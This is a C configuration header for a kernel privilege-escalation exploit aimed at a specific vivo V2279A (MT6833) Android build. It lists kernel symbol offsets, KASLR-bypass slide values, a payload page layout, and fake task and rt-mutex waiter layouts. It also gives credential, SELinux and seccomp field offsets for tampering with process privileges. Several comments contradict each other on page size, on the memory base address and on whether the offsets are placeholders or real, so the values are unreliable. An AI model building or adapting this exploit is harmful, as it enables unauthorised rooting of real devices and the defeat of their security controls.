#ifndef TARGET_H
#define TARGET_H

/* ================================================================
 * Target: vivo V2279A (PD2279J) - MT6833 Dimensity
 * Kernel: Linux 5.10.149-android12 (16KB pages, LE)
 * Build: SP1A.210812.003 / compiler09280002
 * Fingerprint: vivo/PD2279J/PD2279J:12/SP1A.210812.003/compiler09280002:user/release-keys
 *
 * STATUS:
 *   ✅ CONFIRMED: KIMAGE_TEXT_BASE, INIT_TASK, ASHMEM fops/fns, CONFIGFS fns
 *   ✅ CONFIRMED: COPY_SPLICE_READ (most common splice_read in 144 fops)
 *   ✅ CONFIRMED: generic_file_llseek (most common llseek in 59 fops)
 *   ⚠️  Assumed same as caiman: struct field offsets (verify for 16KB pages)
 *   ⚠️  TODO: kmalloc_caches, selinux_enforcing, security_hook_heads,
 *             anon_pipe_buf_ops, empty_zero_page, root_task_group,
 *             init_uts_ns, selinux_blob_sizes, slide symbols
 * ================================================================ */

#define BUILD_VARIANT_LABEL "mt6833_v2279a_12"
#define BUILD_FINGERPRINT "vivo/PD2279J/PD2279J:12/SP1A.210812.003/compiler09280002:user/release-keys"

/* ================================================================
 * Memory Layout (ARM64 47-bit VA, 16KB pages)
 * VA_BITS=47 → PAGE_OFFSET=0xFFFFC00000000000
 * ================================================================ */
#define KIMAGE_TEXT_BASE               0xffffffedb6680000ULL  /* runtime: perf leak matched el0_svc/el0_svc_common */
#define P0_PAGE_OFFSET                 0xffffff8000000000ULL  /* 48-bit VA, from KASLD runtime */
#define P0_PHYS_OFFSET                 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD            0x80000000ULL
#define KERNELSNITCH_IDENTITY_START    0xffffff8080000000ULL  /* direct map + PHYS_OFFSET */
#define KERNELSNITCH_IDENTITY_END      0xffffff8380000000ULL  /* start + 12GB - full RAM coverage */
#define DIRECT_MAP_BASE                0xffffff8000000000ULL
#define DIRECT_MAP_END                 0xffffff9000000000ULL  /* 64GB direct map */
#define VMEMMAP_START                  0xfffffffe00000000ULL

/* 4KB pages confirmed from /proc/config.gz: CONFIG_ARM64_PAGE_SHIFT=12 */
#define PAGE_SHIFT                     12
#define KS_PAGE_SIZE                   4096
#define KS_PAGE_MASK                   0xfffULL
#define PSELECT_WAITER_WORD_SHIFT      1

/* ================================================================
 * INIT_TASK (confirmed from sub_CE438 decompilation)
 * ================================================================ */
#define INIT_TASK_OFF                  0x02abc140ULL  /* from ELF symbol table */
#define INIT_TASK                      (KIMAGE_TEXT_BASE + INIT_TASK_OFF)

#define SLIDE_INIT_TASK_OFF            INIT_TASK_OFF
#define SLIDE_INIT_TASK_IMAGE          INIT_TASK

/* ================================================================
 * Ashmem (confirmed from fops struct @ 0x2581E60)
 * ================================================================ */
#define ASHMEM_FOPS_OFF               0x02581e60ULL
#define ASHMEM_FOPS                   (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)

#define ASHMEM_MISC_FOPS_OFF          ASHMEM_FOPS_OFF
#define ASHMEM_MISC_FOPS              (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)

#define ASHMEM_IOCTL_OFF              0x01a42440ULL  /* BTI wrapper */
#define ASHMEM_COMPAT_IOCTL_OFF       0x01a42448ULL  /* BTI wrapper */
#define ASHMEM_MMAP_OFF               0x01a2a200ULL  /* BTI wrapper */
#define ASHMEM_OPEN_OFF               0x01a3b908ULL  /* BTI wrapper */
#define ASHMEM_RELEASE_OFF            0x01a3b910ULL  /* BTI wrapper */
#define ASHMEM_LLSEEK_OFF             0x01a270d0ULL  /* BTI wrapper */
#define ASHMEM_READ_ITER_OFF          0x01a2a0e0ULL  /* BTI wrapper */
#define ASHMEM_SHOW_FDINFO_OFF        0x01a2a380ULL  /* BTI wrapper */

#define ASHMEM_IOCTL                  (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL           (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP                   (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN                   (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE                (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO            (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)

/* ================================================================
 * ConfigFS (confirmed from configfs file_operations @ 0x2423A78)
 * ================================================================ */
#define CONFIGFS_READ_ITER_OFF        0x01a2baa8ULL  /* BTI wrapper → sub_3AE3D8 */
#define CONFIGFS_BIN_WRITE_ITER_OFF   0x01a2bad8ULL  /* BTI wrapper → sub_3AE414 */

#define CONFIGFS_READ_ITER            (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER       (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)

/* ================================================================
 * Generic VFS functions (by frequency analysis on 2000+ fops structs)
 * ================================================================ */
#define COPY_SPLICE_READ_OFF          0x01a27040ULL  /* 144 fops use this splice_read */
#define COPY_SPLICE_READ              (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)

#define NOOP_LLSEEK_OFF               0x01a39f10ULL  /* generic_file_llseek: 59 fops use this */
#define NOOP_LLSEEK                   (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)

#define NO_LLSEEK_OFF                 0x01a27010ULL  /* no_llseek (returns -ESPIPE): 87 fops */
#define NO_LLSEEK                     (KIMAGE_TEXT_BASE + NO_LLSEEK_OFF)

/* ================================================================
 * PLACEHOLDER offsets — compiles but will CRASH at runtime.
 * Replace with real values after extraction from kernel binary.
 * ================================================================ */
#define ANON_PIPE_BUF_OPS_OFF         0x0242f328ULL  /* from ELF symbol table */
#define KMALLOC_CACHES_OFF            0x025c38e8ULL  /* from ELF symbol table */
#define SECURITY_HOOK_HEADS_OFF       0x025c3db0ULL  /* from ELF symbol table */
#define SELINUX_STATE_OFF             0x02e85bd0ULL  /* selinux_state base */
#define SELINUX_ENFORCING_OFF         0x02e85bf0ULL  /* selinux_state + 0x20 (enforcing field) */
#define EMPTY_ZERO_PAGE_OFF           0x02cf4000ULL  /* from ELF symbol table */
#define ROOT_TASK_GROUP_OFF           0x02cfa100ULL  /* from ELF symbol table */
#define INIT_UTS_NS_OFF               0x02abbee8ULL  /* from ELF symbol table */
#define SELINUX_BLOB_SIZES_OFF        0x025c4440ULL  /* from ELF symbol table */

#define ANON_PIPE_BUF_OPS    (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
#define KMALLOC_CACHES       (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define SECURITY_HOOK_HEADS  (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define SELINUX_ENFORCING    (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define EMPTY_ZERO_PAGE      (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP      (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define INIT_UTS_NS          (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define SELINUX_BLOB_SIZES   (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)

/* Slide / KASLR Bypass Offsets */
#define SLIDE_NFULNL_LOGGER_OFF        0x02ab1600ULL  /* nfulnl_logger */
#define SLIDE_LOGGERS_0_1_OFF          0x02ab1528ULL  /* loggers */
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF  0x02e9f5fdULL  /* sysctl_bootid (replaces random_boot_id) */
#define SLIDE_SYSCTL_BOOTID_OFF        0x02e9f5fdULL  /* sysctl_bootid */
#define SLIDE_ROOT_TASK_GROUP_OFF      ROOT_TASK_GROUP_OFF

#define SLIDE_NFULNL_LOGGER_IMAGE       (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE         (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE     (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE       (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* ================================================================
 * Payload Page Layout (from caiman, same for all targets)
 * ================================================================ */
#define LOCK_OFF                       0x1350
#define W0_OFF                         0x2220
#define FOPS_OFF                       0x1000
#define SCRATCH_OFF                    0x3000
#define RIGHT_OFF                      0x4440
#define LEFT_OFF                       0x5550
#define FAKE_TASK_OFF                  0x3200

/* ================================================================
 * Waiter / Futex Struct Offsets (from caiman)
 * ================================================================ */
#define WAITER_LOCAL_OFF               0x80
#define WAITER_TREE_ENTRY_OFF          0x00
#define WAITER_PI_TREE_ENTRY_OFF       0x18
#define WAITER_TASK_OFF                0x30
#define WAITER_LOCK_OFF                0x38
#define WAITER_WAKE_STATE_OFF          0x40
#define WAITER_PRIO_OFF                0x44
#define WAITER_DEADLINE_OFF            0x48
#define WAITER_WW_CTX_OFF              0x50

#define FAKE_WAITER_TREE_PRIO_OFF      0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF  0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF  0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF   0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF           0x50
#define FAKE_WAITER_LOCK_OFF           0x58
#define FAKE_WAITER_WAKE_STATE_OFF     0x60
#define FAKE_WAITER_WW_CTX_OFF         0x68

/* ================================================================
 * Task/struct offsets (from caiman 5.15, may need 5.10 16KB page adjustment)
 * ================================================================ */
#define FAKE_TASK_USAGE_OFF            0x40
#define FAKE_TASK_PRIO_OFF             0x84
#define FAKE_TASK_NORMAL_PRIO_OFF      0x8c
#define FAKE_TASK_TASK_GROUP_OFF       0x348
#define FAKE_TASK_PI_LOCK_OFF          0x924
#define FAKE_TASK_PI_WAITERS_OFF       0x938
#define FAKE_TASK_PI_TOP_TASK_OFF      0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF    0x950

#define CFG_PAGE_OFF                   16
#define CFG_NEEDS_READ_FILL_OFF        80
#define CFG_BIN_BUFFER_OFF             88
#define CFG_BIN_BUFFER_SIZE_OFF        96
#define CFG_CB_MAX_SIZE_OFF            100

#define MM_OWNER_OFF                   1032
#define TASK_PID_OFF                   0x618
#define TASK_TGID_OFF                  0x61c
#define TASK_REAL_PARENT_OFF           0x628
#define TASK_ATOMIC_FLAGS_OFF          0x5d8
#define TASK_REAL_CRED_OFF             0x818
#define TASK_CRED_OFF                  0x820
#define TASK_COMM_OFF                  0x830
#define TASK_TASKS_OFF                 0x550
#define TASK_THREAD_INFO_FLAGS_OFF     0x00
#define TASK_SECCOMP_OFF               0x8e8

#define CRED_UID_OFF                   8
#define CRED_SECUREBITS_OFF            40
#define CRED_CAPS_OFF                  48
#define CRED_SECURITY_OFF              128
#define SELINUX_CRED_BLOB_OFF          0
#define SELINUX_CRED_OSID_OFF          0
#define SELINUX_CRED_SID_OFF           4

#define SECCOMP_MODE_OFF               0x00
#define SECCOMP_FILTER_COUNT_OFF       0x04
#define SECCOMP_FILTER_OFF             0x08
#define TIF_SECCOMP_BIT                11
#define PFA_NO_NEW_PRIVS_BIT           0

#define STRUCT_PAGE_SIZE               0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF  0x08
#define STRUCT_SLAB_CACHE_OFF          0x08
#define STRUCT_PAGE_TYPE_OFF           0x30

#define PIPE_BUFFER_SIZE               0x28
#define PIPE_BUFFER_SLOTS              32
#define PIPE_BUF_FLAG_CAN_MERGE        0x10
#define PIPE_INODE_INFO_STRUCT_SIZE    0xb8
#define PIPE_INODE_INFO_SIZE           0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF                  0x60
#define PIPE_TAIL_OFF                  0x64
#define PIPE_MAX_USAGE_OFF             0x68
#define PIPE_RING_SIZE_OFF             0x6c
#define PIPE_NR_ACCOUNTED_OFF          0x70
#define PIPE_READERS_OFF               0x74
#define PIPE_WRITERS_OFF               0x78
#define PIPE_FILES_OFF                 0x7c
#define PIPE_TMP_PAGE_OFF              0x90
#define PIPE_BUFS_OFF                  0xa8
#define PIPE_USER_OFF                  0xb0

#define FOPS_OWNER_OFF                 0x00
#define FOPS_LLSEEK_OFF                0x08
#define FOPS_READ_OFF                  0x10
#define FOPS_WRITE_OFF                 0x18
#define FOPS_READ_ITER_OFF             0x20
#define FOPS_WRITE_ITER_OFF            0x28
#define FOPS_IOCTL_OFF                 0x50
#define FOPS_COMPAT_IOCTL_OFF          0x58
#define FOPS_MMAP_OFF                  0x60
#define FOPS_OPEN_OFF                  0x70
#define FOPS_RELEASE_OFF               0x80
#define FOPS_SPLICE_READ_OFF           0xc0
#define FOPS_SHOW_FDINFO_OFF           0xe0

#endif /* TARGET_H */
